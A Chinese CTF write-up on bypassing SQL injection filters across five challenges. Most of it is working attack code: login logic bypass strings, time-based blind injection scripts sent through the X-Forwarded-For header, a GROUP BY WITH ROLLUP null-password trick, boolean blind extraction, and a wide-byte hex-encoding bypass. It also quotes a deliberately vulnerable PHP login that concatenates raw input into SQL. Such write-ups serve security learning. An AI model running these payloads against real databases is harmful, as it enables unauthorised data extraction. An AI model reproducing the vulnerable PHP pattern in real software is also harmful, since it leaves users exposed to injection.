SQL花式绕过

 

 

【1】 题目给出过滤了一切，测试得知没有过滤 "\"|and|left|right"等关键字。重要的是不管输入正确与否的SQL句子，总是返回想回的页面，尝试各种方法都是一样的结果。

感觉只能是逻辑绕过。猜测进行验证的代码应该为

select * from *** where username ="" and password="";

目前用户名和密码没有一个知道的。无奈中，发呆好长时间

成功绕过。

username=hello"=" & password = hello"="

拿到flag

【2】XFF基于时间无过滤注入

' or sleep(10) and ''='

延时，说明有注入

' or sleep((select length(flag) from flag)=32) and ''=' 

验证flag长度为32

直接上代码

#coding:utf-8
"""
@author: elope
"""
import requests;
maystr="0987654321qwertyuiopasdfghjklzxcvbnm."
flag=''
for j in range(33):

    for i in maystr:
        url="http://ctf5.shiyanbar.com/web/wonderkun/index.php"
        header={
            # "X-Forwarded-For":"' +(select case when (substring((select database())from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j,i)  #跑数据库的名字
            #"X-Forwarded-For":"' +(select case when (substring((select(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))) from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j,i)  #跑表明
            #"X-Forwarded-For":"' +(select case when (substring((select(select(group_concat(column_name))from(information_schema.columns)where(table_name=0x666C6167))) from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j,i) #跑字段名
            "X-Forwarded-For":"' +(select case when (substring((select flag from flag) from %s for 1)='%s') then sleep(5) else 0 end) and 'Zkkp'='Zkkp" % (j,i)  #跑记录
        }
        try:

            res=requests.get(url, headers=header,timeout=4).text
        except:

             flag+=i
             print flag
        # print res

这个代码双重绕过，虽然比较慢，但是准确度更高一点

import requests
import time

url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
maystr="0987654321qwertyuiopasdfghjklzx{_-%!@&*^(?|)}cvbnm."
flag=''



for i in range(33):
    for j in  maystr:
        starttime = time.time()
        headers = {"X-Forwarded-For":"' +(select case when (substring((select flag from flag) from %s for 1)='%s') then sleep(15) else 0 end) and 'Zkkp'='Zkkp" % (i,j)}
        res = requests.get(url,headers=headers)
        if time.time()-starttime > 10:
            res = requests.get(url,headers=headers)
            if time.time()-starttime > 10:
                flag += j
                print flag
                break
        else:
            pass
            
        

直接出结果

【3】强制使密码为空

直接上代码吧

<?php
error_reporting(0);

if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
    echo '<form action="" method="post">'."<br/>";
    echo '<input name="uname" type="text"/>'."<br/>";
    echo '<input name="pwd" type="text"/>'."<br/>";
    echo '<input type="submit" />'."<br/>";
    echo '</form>'."<br/>";
    echo '<!--source: source.txt-->'."<br/>";
    die;
}

function AttackFilter($StrKey,$StrValue,$ArrReq){  
    if (is_array($StrValue)){
        $StrValue=implode($StrValue);
    }
    if (preg_match("/".$ArrReq."/is",$StrValue)==1){   
        print "水可载舟，亦可赛艇！";
        exit();
    }
}

$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){ 
    AttackFilter($key,$value,$filter);
}

$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
if (!$con){
    die('Could not connect: ' . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con);
$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql); 
if (mysql_num_rows($query) == 1) { 
    $key = mysql_fetch_array($query);
    if($key['pwd'] == $_POST['pwd']) {
        print "CTF{XXXXXX}";
    }else{
        print "亦可赛艇！";
    }
}else{
    print "一颗赛艇！";
}
mysql_close($con);
?>

绕过用户名容易 。直接使用uname = ' or 1=1 limit 1#

使返回一条 就绕过

但是需要填进去的密码，和读出来的密码相同。这不是废话么，相同的话不是直接拿到了

if($key['pwd'] == $_POST['pwd'])

发现这个。我们使读出来的密码为空不是可以了。

查看有几个用户

select * from test offset 1 limit 1; 正常

select * from test offset 1 limit 1;错误

 

说明只有两行

现在需要构造一个NULL值

成功。

直接输入 uname = admin' or 1=1 group by pwd with rollup limit 1 offset 2#&pwd=(空)

返回flag

【4】无脑洞的盲住

直接贴代码

import requests

flag =""

for i in range(1,30):
    for j in range(33,126):
        url = "http://ctf5.shiyanbar.com/web/index_3.php?id=1'and if(ascii(substr((select flag from flag),"+str(i)+",1))="+str(j)+",1,0)%23" 

        res = requests.get(url)

        if(res.text.encode('GBK','ignore').find('Hello') != -1):
            flag += chr(int(j))
            print flag
            break
        else:
            pass

【5】njctf一道题

过滤了空格。双字节编码。对单引号进行编码，对双引号当成字符输入,所以用16进制编码绕过。

import string
import binascii
import requests

s = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"
u = "http://218.2.197.235:23733/index.php?key=a%df'||right(left((select(flag)from(flag)),{pos}),1)=0x{c}%23"
payload = ''
for i in xrange(1, 35):
        for c in s:
                url = u.format(pos=i, c=binascii.hexlify(c))
                r = requests.get(url)
                if 'showContent' in r.content:
                        sign = 1
                        payload += c
                        print payload
                        break
        if payload[-1] == '}':
                break